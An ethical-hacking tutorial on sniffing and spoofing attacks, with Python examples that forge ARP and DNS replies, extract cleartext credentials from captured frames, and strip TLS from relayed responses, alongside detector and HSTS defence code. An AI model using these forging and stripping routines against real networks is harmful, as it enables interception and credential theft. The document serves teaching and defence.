What Are Sniffing and Spoofing? Meaning, Difference, Types of Spoofing & Sniffing Attack
Introduction
What is a sniffing and spoofing attack in cyber security? What are the different types of sniffing and spoofing attacks? What is the difference between spoofing and sniffing attacks?
In this write-up, you will find answers to all your questions in simple terms. These are some of the major types of hacking attacks that can disrupt not only individuals but also businesses.
Hence, you must know what a sniffing attack is as well as what a spoofing attack is. As part of our comprehensive Ethical Hacking Tutorial for Beginners, we have covered both in detail here.
What is Sniffing Attack in Cyber Security?
When an attacker captures and reads the data flowing across a network, it is called a sniffing attack. Anything sent in cleartext can be read this way: passwords, account details, email traffic, telnet sessions, and so on. Encrypted traffic (HTTPS, SSH) still reveals who is talking to whom and how much, but not the content.
The same technique is used legitimately by network and system administrators to monitor and troubleshoot network traffic.
For details on what networking is and its types, see the linked write-up.
What Are Types of Sniffing Attack?
Now that you know what a sniffing attack is, let's look at the different types.
1. Active Sniffing
When sniffing is done on a switched network (or a point-to-point link), it is called active sniffing. A switch forwards each frame only to the port where its destination MAC address lives, so the attacker has to inject traffic to make the switch, or the victim, send frames through the attacker's port. The usual ways are ARP spoofing (sending forged Address Resolution Protocol replies so hosts deliver their traffic to the attacker's MAC address) and MAC flooding (overfilling the switch's address table so it falls back to repeating frames to every port). Because the attacker transmits packets, active sniffing can be detected on the wire; in exchange, the attacker is positioned to modify traffic, not just read it.
2. Passive Sniffing
When sniffing is done on a hub-based (non-switched) network, it is called passive sniffing. A hub repeats every frame to every port, so the attacker only has to put a network card into promiscuous mode and capture; nothing is sent, which makes passive sniffing very hard to detect from the network. The same applies on open Wi-Fi or anywhere else the attacker already sits on the traffic path. The attacker works at the data link layer, reading frames as they arrive.
Important Things to Know About Sniffing Attack in Cyber Security
Given below are some important concepts and tools related to sniffing in cyber security:
1. Packet Capture
Packet capture is the technique of recording the packets that pass through a network interface so they can be reviewed later. Administrators rely on it to keep a network secure and efficient: reviewing and analyzing IP packets and examining traffic to detect security threats.
Attackers use the same captures to pick out confidential information, such as usernames and passwords, from unencrypted protocols. A purely passive capture sends no packets of its own, so it leaves nothing on the network for investigators to trace; the only evidence is on the capturing host (an interface in promiscuous mode, capture files on disk).
2. tcpdump
tcpdump is a command-line packet capture and analysis tool built on the libpcap library. It prints the TCP/IP (and other) packets flowing over a network, or writes them to a capture file for later analysis.
It runs on most UNIX-like operating systems, including Linux, FreeBSD, Solaris, NetBSD, macOS, OpenWrt, and AIX. Attackers can use tcpdump to see usernames, passwords, URLs, and web content transmitted over unencrypted traffic.
3. tshark
tshark is the command-line network protocol analyzer that ships with Wireshark. It captures or reads packets on a network and operates much like tcpdump, but with Wireshark's protocol dissectors and filters available. Its native capture file format is pcapng, and it uses the pcap library for capture.
4. Wireshark
Wireshark is the best-known graphical network protocol analyzer. Network administrators and ethical hackers use it to monitor activity on a network and perform in-depth, packet-by-packet analysis.
It supports most operating systems, including Windows, Linux, Solaris, macOS, and NetBSD.
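As an added example (not code from the original article), the Python script below decodes a constructed Ethernet/IPv4/TCP frame the way tcpdump or Wireshark would, and pulls the username and password out of an HTTP Basic Authorization header carried over plain HTTP. The frames, addresses and credentials are fabricated for the example. The point is that a passive sniffer needs nothing more than this to recover credentials from an unencrypted protocol, while the same decoder gets only opaque bytes from the TLS record sent to port 443.

```python
import base64
import struct
from typing import List, Optional, Tuple

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6


def build_frame(src_ip: str, dst_ip: str, dst_port: int, payload: bytes) -> bytes:
    """Build a minimal Ethernet II / IPv4 / TCP frame around a payload.
    Only used to construct sample traffic (checksums are left zero; the decoder
    below does not verify them, just as a sniffer does not need to)."""
    eth = bytes.fromhex("020000000002") + bytes.fromhex("020000000001") + struct.pack("!H", ETHERTYPE_IPV4)
    # sport, dport, seq, ack, data offset (5 words), flags PSH|ACK, window, checksum, urgent
    tcp = struct.pack("!HHIIBBHHH", 40000, dst_port, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, IPPROTO_TCP, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return eth + ip + tcp + payload


def parse_frame(frame: bytes) -> Optional[dict]:
    """Decode Ethernet II -> IPv4 -> TCP; return addresses, ports and payload,
    or None for anything that is not IPv4/TCP."""
    if len(frame) < 14 + 20 + 20:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                      # IP header length in bytes
    total_len = struct.unpack("!H", ip[2:4])[0]
    ip = ip[:total_len]                           # drop any Ethernet padding
    if ip[9] != IPPROTO_TCP:
        return None
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4                 # TCP header length in bytes
    return {
        "src_ip": ".".join(str(b) for b in ip[12:16]),
        "dst_ip": ".".join(str(b) for b in ip[16:20]),
        "src_port": sport,
        "dst_port": dport,
        "payload": tcp[data_off:],
    }


def extract_basic_auth(payload: bytes) -> Optional[Tuple[str, str]]:
    """Return (user, password) from an HTTP Basic Authorization header, if present."""
    for line in payload.split(b"\r\n"):
        if line.lower().startswith(b"authorization: basic "):
            parts = line.split(None, 2)
            if len(parts) < 3:
                continue
            try:
                user, _, password = base64.b64decode(parts[2]).partition(b":")
            except ValueError:
                continue
            return user.decode(errors="replace"), password.decode(errors="replace")
    return None


def sniff_credentials(frames: List[bytes]) -> List[Tuple[str, str, str, str]]:
    """What a passive sniffer harvests: (src_ip, dst_ip, user, password) per hit."""
    found = []
    for frame in frames:
        pkt = parse_frame(frame)
        if pkt is None:
            continue
        creds = extract_basic_auth(pkt["payload"])
        if creds:
            found.append((pkt["src_ip"], pkt["dst_ip"]) + creds)
    return found


# Constructed sample traffic: one plain-HTTP login and one TLS record to port 443.
HTTP_REQUEST = (
    b"GET /admin HTTP/1.1\r\nHost: intranet.example\r\n"
    b"Authorization: Basic " + base64.b64encode(b"alice:Winter2024!") + b"\r\n\r\n"
)
TLS_RECORD = b"\x17\x03\x03\x00\x20" + bytes(range(32))   # opaque application data

SAMPLE_FRAMES = [
    build_frame("10.0.0.5", "10.0.0.10", 80, HTTP_REQUEST),
    build_frame("10.0.0.5", "10.0.0.10", 443, TLS_RECORD),
]

if __name__ == "__main__":
    for hit in sniff_credentials(SAMPLE_FRAMES):
        print("%s -> %s  user=%s password=%s" % hit)
```

Feeding the same decoder the bytes of a real capture file is a matter of stripping the pcap record headers; the protocol layers above them are exactly what Wireshark's dissectors walk.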
What is Spoofing Attack in Cyber Security?
Spoofing attacks are those in which the attacker impersonates a trusted person, device, or company to gain unauthorized access to data, spread malware, or do other harm. The term covers faking any identifier another party trusts: an email sender, a domain name, an IP or MAC address, an ARP or DNS reply.
For example, if an organization uses Office 365 for team productivity, an attacker can send emails from a lookalike domain such as offiec365.com and trick users into clicking the link in the email.
What Are Different Types of Spoofing Attacks?
So far, we have covered what sniffing and spoofing are in cyber security. Now, it's time to look at the different types of spoofing attacks.
1. ARP Spoofing
ARP stands for Address Resolution Protocol, which maps IP addresses to MAC addresses on a LAN. ARP has no authentication: any host can send a reply, and most systems update their ARP cache when one arrives, even if they never asked. In ARP spoofing (also called ARP poisoning), the attacker sends forged ARP replies on the LAN that bind the attacker's MAC address to the IP address of a legitimate host, typically the default gateway or a server. Victims then deliver the traffic meant for that IP address to the attacker, who can read it, modify it, forward it on so nothing looks broken, and use the position to launch further attacks. Because ARP never leaves the local network, this only works when the attacker is on the same LAN (or VLAN) as the victim.
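The following Python example is added here to make the ARP spoofing attack above, and the active sniffing it enables, concrete; it is not code from the original article. It builds the forged ARP reply an attacker sends to a victim ("the gateway is at my MAC address"), and it implements the detection side: an arpwatch-style watcher that remembers the MAC first seen for each IP and alerts when a different MAC claims it, without letting the forged reply overwrite the known binding. All addresses are fabricated for the example.

```python
import struct
from typing import Dict, List, Optional

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join("%02x" % b for b in raw)


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def bytes_to_ip(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp(opcode: int, sender_mac: str, sender_ip: str,
              target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an ARP packet (RFC 826 layout)."""
    eth = mac_to_bytes(target_mac) + mac_to_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)   # Ethernet, IPv4, 6-byte MAC, 4-byte IP
           + mac_to_bytes(sender_mac) + ip_to_bytes(sender_ip)
           + mac_to_bytes(target_mac) + ip_to_bytes(target_ip))
    return eth + arp


def parse_arp(frame: bytes) -> Optional[dict]:
    """Decode an ARP frame; None if the frame is not Ethernet/IPv4 ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    arp = frame[14:]
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", arp[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "opcode": opcode,
        "sender_mac": bytes_to_mac(arp[8:14]), "sender_ip": bytes_to_ip(arp[14:18]),
        "target_mac": bytes_to_mac(arp[18:24]), "target_ip": bytes_to_ip(arp[24:28]),
    }


def poison_frame(attacker_mac: str, spoofed_ip: str, victim_mac: str, victim_ip: str) -> bytes:
    """The attacker's forged reply: 'spoofed_ip is at attacker_mac', sent to the victim.
    Hosts update their ARP cache on replies they never requested, so this is all it takes."""
    return build_arp(ARP_REPLY, attacker_mac, spoofed_ip, victim_mac, victim_ip)


class ArpWatcher:
    """arpwatch-style detector: remembers the first MAC seen for each IP (or a trusted
    static table) and alerts when a different MAC claims the same IP."""

    def __init__(self, trusted: Optional[Dict[str, str]] = None):
        self.bindings: Dict[str, str] = dict(trusted or {})
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> Optional[str]:
        arp = parse_arp(frame)
        if arp is None:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac            # first sighting: learn it
            return None
        if known != mac:
            # keep the original binding; the forged reply must not overwrite it
            alert = "ARP conflict: %s was %s, now claimed by %s (opcode %d)" % (ip, known, mac, arp["opcode"])
            self.alerts.append(alert)
            return alert
        return None


# Constructed LAN for the example: gateway, victim and attacker (all fabricated).
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "02:00:00:00:00:01"
VICTIM_IP, VICTIM_MAC = "10.0.0.5", "02:00:00:00:00:05"
ATTACKER_MAC = "02:00:00:00:00:99"

LEGIT_REPLY = build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
POISONED_REPLY = poison_frame(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)

if __name__ == "__main__":
    watcher = ArpWatcher()
    watcher.observe(LEGIT_REPLY)
    print(watcher.observe(POISONED_REPLY))
```

On a production network the watcher would be seeded with a static table of critical bindings (gateway, DNS, DHCP servers) rather than trusting the first reply it happens to see, since an attacker who is already poisoning when the watcher starts would otherwise be learned as legitimate.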
2. DNS Spoofing
DNS spoofing (also called DNS cache poisoning) takes place when an attacker gets a false answer accepted for a DNS query, either by forging a reply to the victim's or the resolver's query, or by altering the records a resolver has cached. Users who type the correct name are then sent to an attacker-controlled server instead of the legitimate site.
When users sign up or log in there with their credentials, the attacker collects this sensitive information and uses it for malicious purposes. The fake site can also serve malware to visitors who believe they are on the legitimate site.
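As an added example (not from the original article), the Python code below shows the forgery side of DNS spoofing and the check that decides whether it works. It builds the query a stub resolver sends, forges a response that copies the query's transaction ID and question and answers with an attacker-chosen address, and then applies the resolver-side acceptance rule: a response is only taken if its transaction ID matches an outstanding query and the question matches. An attacker who can sniff the query knows the ID and wins; a blind attacker has to guess it (and, on real resolvers, the randomized UDP source port as well). Names and addresses are fabricated.

```python
import struct
from typing import Dict, List, Optional, Tuple


def encode_name(name: str) -> bytes:
    """DNS wire-format name: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"


def decode_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Decode a (possibly compressed) name; return (name, offset just after it)."""
    labels = []
    while True:
        length = msg[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:                       # compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            labels.append(decode_name(msg, ptr)[0])
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + length].decode())
        off += 1 + length


def build_query(txid: int, name: str) -> bytes:
    """Standard recursive A query, as a stub resolver would send it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, one question
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # type A, class IN


def forge_response(query: bytes, spoofed_ip: str, ttl: int = 86400) -> bytes:
    """What the spoofer sends: an answer that copies the victim's transaction ID and
    question and points the name at an attacker-controlled address, with a long TTL
    so the poisoned entry stays cached."""
    txid = struct.unpack("!H", query[:2])[0]
    _, qend = decode_name(query, 12)
    question = query[12:qend + 4]                        # QNAME + QTYPE + QCLASS
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA; one answer
    answer = (struct.pack("!H", 0xC00C)                  # pointer to the name in the question
              + struct.pack("!HHIH", 1, 1, ttl, 4)       # type A, class IN, TTL, rdlength
              + bytes(int(o) for o in spoofed_ip.split(".")))
    return header + question + answer


def parse_response(msg: bytes) -> dict:
    txid, flags, qd, an = struct.unpack("!HHHH", msg[:8])
    qname, off = decode_name(msg, 12)
    off += 4                                             # skip QTYPE + QCLASS
    answers: List[str] = []
    for _ in range(an):
        _, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            answers.append(".".join(str(b) for b in msg[off:off + 4]))
        off += rdlen
    return {"txid": txid, "flags": flags, "qname": qname, "answers": answers}


def accept_response(outstanding: Dict[int, str], response: bytes) -> Optional[List[str]]:
    """Resolver-side check: accept only if the transaction ID belongs to a query we sent
    and the question matches it. Spoofed replies that fail either test are dropped."""
    parsed = parse_response(response)
    if parsed["flags"] & 0x8000 == 0:                    # QR bit clear: not a response
        return None
    if outstanding.get(parsed["txid"]) != parsed["qname"]:
        return None
    del outstanding[parsed["txid"]]
    return parsed["answers"]


# Constructed example: the victim asks for bank.example; the attacker injects 203.0.113.7.
VICTIM_QUERY = build_query(0x1234, "bank.example")
SPOOFED = forge_response(VICTIM_QUERY, "203.0.113.7")

if __name__ == "__main__":
    print(parse_response(SPOOFED))
    print(accept_response({0x1234: "bank.example"}, SPOOFED))
```

The 16-bit transaction ID alone gives a blind attacker a 1-in-65536 chance per forged packet, which is why resolvers also randomize the UDP source port and why DNSSEC validation, rather than packet matching, is the real fix.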
3. SSL Stripping
SSL stripping is a man-in-the-middle technique that quietly downgrades a victim's HTTPS connection to plain HTTP. The attacker keeps a normal HTTPS connection to the real web server but serves the victim an HTTP copy, rewriting the https:// links and redirects in the relayed pages to http://. Most users notice only the missing padlock, so the traffic between browser and attacker travels in cleartext where it can be read and modified. The defense is HTTP Strict Transport Security (HSTS), ideally with browser preloading, which makes the browser refuse to speak plain HTTP to the site in the first place, so there is no HTTP session to strip.
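As an added example (not code from the original article), the Python below shows what the stripping proxy does to each response it relays, and why HSTS defeats it. `strip_tls` rewrites https:// links and redirects to http://, removes the Strict-Transport-Security header so the victim's browser never learns the policy, drops the Secure flag from cookies so they keep flowing in cleartext, and fixes Content-Length so the response still parses. The `Browser` class is a minimal model of the client side: a browser that already knows the host is HSTS (from a previous HTTPS visit or the preload list) connects over HTTPS regardless of what the user typed. The response and hostname are fabricated.

```python
import re
from typing import Iterable


def strip_tls(response: bytes) -> bytes:
    """Attacker-side rewrite applied to a response fetched from the real server over
    HTTPS before it is relayed to the victim over HTTP."""
    head, sep, body = response.partition(b"\r\n\r\n")
    body = body.replace(b"https://", b"http://")
    out = []
    for line in head.split(b"\r\n"):
        name, colon, value = line.partition(b":")
        key = name.strip().lower()
        if key == b"strict-transport-security":
            continue                                    # victim must never learn HSTS
        if key == b"location":
            value = value.replace(b"https://", b"http://")   # downgrade redirects too
        elif key == b"set-cookie":
            value = re.sub(rb";\s*secure\b", b"", value, flags=re.IGNORECASE)
        elif key == b"content-length":
            value = b" " + str(len(body)).encode()     # body shrank by one byte per rewritten URL
        out.append(name + colon + value)
    return b"\r\n".join(out) + sep + body


class Browser:
    """Minimal model of the client-side defense: a browser that honours HSTS."""

    def __init__(self, preload: Iterable[str] = ()):
        self.hsts_hosts = set(preload)                  # hosts known to be HTTPS-only

    def learn(self, host: str, response: bytes) -> None:
        """Remember HSTS from a response that arrived over HTTPS."""
        if b"\r\nstrict-transport-security:" in response.lower():
            self.hsts_hosts.add(host)

    def scheme_used(self, host: str, typed_scheme: str) -> str:
        """Scheme the browser actually connects with for a typed or followed URL."""
        return "https" if host in self.hsts_hosts else typed_scheme


# Constructed response from the real site, as the attacker receives it over HTTPS.
REAL_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Strict-Transport-Security: max-age=31536000\r\n"
    b"Set-Cookie: session=abc123; Secure; HttpOnly\r\n"
    b"Content-Length: 63\r\n"
    b"\r\n"
    b'<a href="https://bank.example/login">Log in</a> to bank.example'
)

if __name__ == "__main__":
    print(strip_tls(REAL_RESPONSE).decode())
```

Note the asymmetry: a victim whose browser has never seen the site over HTTPS (and whose site is not preloaded) types bank.example, the browser sends plain HTTP, and the stripped copy is all it ever sees; a browser with the host in its HSTS set never sends that first HTTP request, so the attacker has nothing to rewrite.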
4. MAC Attacks
In MAC spoofing attacks, the attacker first sniffs the network to learn the MAC addresses of legitimate devices, then changes their own interface's MAC address to match one of them.
MAC addresses are trivially changeable in software, so any control that trusts them (switch port security, Wi-Fi MAC filtering, captive portals that remember an authenticated device by MAC) can be bypassed this way. The attacker can then join the network as, or in place of, the impersonated device and gather information such as host IP addresses and the applications in use.
5. DHCP Flooding
DHCP flooding (also called DHCP starvation) happens when an attacker sends a flood of DHCP requests, each from a different spoofed MAC address, until every address in the server's pool has been leased out.
Once the pool is exhausted, the server cannot issue any more addresses. This is a denial of service (DoS): new users cannot get an address and so cannot use the network. Starvation is often the first step of a rogue DHCP attack, since a client the real server can no longer answer will accept a lease from whoever does.
6. DHCP Rogue
A rogue DHCP server is one set up by an attacker on the network, outside the control of the network administrator. Because clients accept the first DHCP offer they receive, the rogue server can hand out leases that point clients at an attacker-controlled default gateway or DNS server, and the administrators may not notice the harm being done with the DHCP capabilities the rogue server has.
Attackers generally use such servers to launch man-in-the-middle attacks, sniffing, and reconnaissance attacks on the network. On managed switches, DHCP snooping is the usual countermeasure: it drops DHCP server replies that arrive on ports not marked as trusted.
7. MITM Attack
MITM stands for man in the middle. In a MITM attack, the attacker positions himself in the path between a user and a server and relays traffic in both directions, so each side believes it is talking directly to the other. Several of the techniques above (ARP spoofing, a rogue DHCP server, DNS spoofing) are ways of getting into that position; SSL stripping is something the attacker does once there.
The aim is to eavesdrop on the communication, or to impersonate one of the parties, in order to steal confidential data, login details, bank account information, and so on.
The stolen information can be used to cause financial loss to the users, commit identity theft, or take over their accounts by changing the passwords.
Using Wireshark for Sniffing
Wireshark is a popular tool for packet sniffing and analysis. It captures traffic on a local interface and saves it to a capture file for offline analysis. The interface can be Ethernet, Wi-Fi, Bluetooth, a loopback interface, and many others (legacy media such as Token Ring are supported as well).
Attackers use Wireshark to sniff the traffic between hosts of interest, applying capture and display filters to narrow the stream to what they want to trace, for example only the traffic between two IP addresses or only traffic on one port, such as `tcp.port == 80`.
When started, Wireshark lists the network interfaces it can capture from. After selecting an interface, the attacker starts the capture and sees every frame that reaches that interface. On a switched network that is only the attacker's own traffic plus broadcasts, which is why sniffing is usually combined with one of the spoofing techniques described above to pull other devices' traffic through the attacker's machine.